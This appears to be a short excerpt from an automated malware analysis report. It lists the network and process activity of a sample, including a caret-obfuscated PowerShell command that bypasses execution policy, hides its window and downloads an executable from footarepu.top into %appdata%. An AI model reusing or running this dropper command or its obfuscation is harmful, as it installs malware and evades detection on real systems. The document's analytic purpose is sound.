Technical Information
- http://footarepu.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^WER^she^lL.E^XE ^-eXe^cUtI^onp^oLicy ^bYp^As^S -Nopro^fI^le^ -^wIndOWsTy^Le HIDD^EN (^n^EW^-^oBj^Ec^t SYstE^m.nET^.w^Eb^cLIEnt^).D^owNl^o^aDFILe('http://footarepu.top/read.p...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "Po^WER^she^lL.E^XE ^-eXe^cUtI^onp^oLicy ^bYp^As^S -Nopro^fI^le^ -^wIndOWsTy^Le HIDD^EN (^n^EW^-^oBj^Ec^t SYstE^m.nET^.w^Eb^cLIEnt^).D^owNl^o^aDFILe('http://footarepu.top/read.p...' (with hidden window)